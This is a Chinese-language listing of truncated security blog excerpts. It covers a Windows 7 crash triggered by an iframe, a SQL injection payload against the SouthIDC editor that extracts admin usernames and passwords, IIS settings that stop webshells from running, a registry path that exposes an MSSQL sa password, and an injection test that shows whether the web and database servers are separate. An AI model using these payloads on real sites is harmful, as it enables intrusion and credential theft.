-
简单的HTML代码弄死Windows 7
这个很小的 iframe 标签(当然了,实际上它运行起来并不小)是一个强大到足以让一个64位的Win7系统崩溃的标签,它将导致 Win7 发生著名的蓝屏错误 Blue Screen Of Death (BSoD). 该漏洞是由 w3bd3v...
-
南方数据编辑器(southidceditor)注入0day漏洞
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&...
-
让webshell无法运行
其实就是运行IIS的对目录文件夹的执行权限设置来达到让webshell无法运行的目的您试图从目录中执行 CGI、ISAPI 或其他可执行程序,但该目录不允许执行程序。Interneter服务器管理----IIS中站点目录右键----属性--...
-
星外提权之注册表读取mssql的sa密码
星外主机注册表mssql密码位置HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALL...
-
利用sql注入点判断网站和数据库是否站库分离
在注入点后加上and exists(select * from admin where 1=(Select (case when host_name()=@@servername then 1 else 0 end))) 注意红色部分的a...
